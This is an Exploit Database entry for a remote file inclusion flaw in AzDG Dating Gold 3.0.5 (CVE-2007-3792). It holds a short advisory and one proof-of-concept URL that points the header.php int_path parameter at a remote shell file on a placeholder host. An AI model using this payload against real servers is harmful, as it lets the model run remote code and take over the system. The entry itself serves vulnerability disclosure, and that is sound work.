Exploit Database - Logo

Dating Gold 3.0.5 - header.php int_path Parameter Remote File Inclusion

EDB-ID: 30301 Author: mostafa_ragab Published: 2007-07-13
CVE: CVE-2007-3792 Type: Webapps Platform: PHP
Aliases: N/A Advisory/Source: Link Tags: N/A
E-DB Verified: Verified Exploit: Download Exploit Code Download / View Raw Vulnerable App: N/A
« Previous Exploit Next Exploit » 
source: http://www.securityfocus.com/bid/24910/info

AzDG Dating Gold is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute an arbitrary remote file containing malicious script code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system. Other attacks are also possible.

AzDG Dating Gold 3.0.5 is vulnerable; other versions may also be affected. 

http://www.example.com/scriptpath/templates/header.php?int_path=http://www.example2.com/shell.txt?cmd

Related Exploits

Trying to match CVEs (1): CVE-2007-3792
Trying to match OSVDBs (1): 36262
Other Possible E-DB Search Terms: Dating Gold 3.0.5,  Dating Gold
Date D V Title Author
2007-07-13Download Exploit Code Verified Dating Gold 3.0.5 - footer.php int_path Parameter Remote File Inclusionmostafa_ragab
2007-07-13Download Exploit Code Verified Dating Gold 3.0.5 - secure.admin.php int_path Parameter Remote File Inclusionmostafa_ragab
Menu